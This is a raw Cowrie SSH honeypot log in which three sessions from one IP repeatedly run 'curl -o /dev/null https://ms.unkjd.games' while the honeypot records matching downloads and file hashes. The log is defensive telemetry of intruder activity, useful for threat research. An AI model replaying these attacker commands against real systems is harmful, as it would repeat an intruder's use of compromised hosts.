{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.110873Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.111598Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.117863Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.118751Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.121563Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.122585Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.126759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.155807Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.156534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.158711Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.159765Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.164937Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.167940Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.171455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.175602Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.176226Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.199401Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.202365Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.203240Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.206093Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.206839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.211463Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.234407Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.235743Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.236704Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.244184Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.245005Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.250051Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.250707Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.254190Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.279137Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.280959Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.283356Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.284329Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.285056Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.288904Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.289580Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.291568Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.292393Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.324582Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.326384Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.329175Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.331685Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.334342Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.335178Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.338396Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.339263Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.343044Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.346232Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.350959Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.352433Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.352969Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.384304Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.385495Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.386110Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.418490Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.419594Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.426457Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.427128Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.430310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.434459Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.491558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.492454Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.496264Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.499517Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.500664Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.501344Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.503473Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.504100Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.507053Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.549542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.551542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.555087Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.555996Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.562339Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.565203Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.567544Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.568469Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.570540Z","src_ip":"212.227.125.160","session":"9f264c568782"}
